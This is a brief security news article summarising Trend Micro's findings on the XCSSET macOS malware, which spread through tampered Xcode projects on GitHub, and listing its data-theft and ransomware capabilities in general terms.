According to Trend Micro, the threat poses a risk to Xcode developers since they share their projects via GitHub. As a result, the malware infected code can lead to a “supply-chain” type attack against other users or organizations that rely on the code repositories.
“These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system,” Trend Micro explained in the blog post.
Trend Micro further describes the threat components that consist of a trojan “XCSSET” and a command and control (C2) related files.
To add, XCSSET performs the following malicious behavior according to the report:
- Exploits a vulnerability to read and dump Safari cookies to steal user data.
- Steals information from the user’s Evernote, Notes, Skype, Telegram, QQ ,and WeChat apps.
- Takes screenshots of the victim’s current screen.
- Uploads files from the infected system to the attacker’s specified server.
- Encrypts files and shows a ransom note, if commanded by the server.
For instance, the malware can steal credentials (e.g., PayPal, Apple ID), payment card data from the Apple Store, or modify cryptocurrency addresses, to name a few.
For more technical details, check out Trend Micro’s XCSSET technical brief.
Readers can also check out Trend Micro’s previous report on another Mac malware threat “ThiefQuest” known to also target macOS systems and is used to encrypt files and install keyloggers.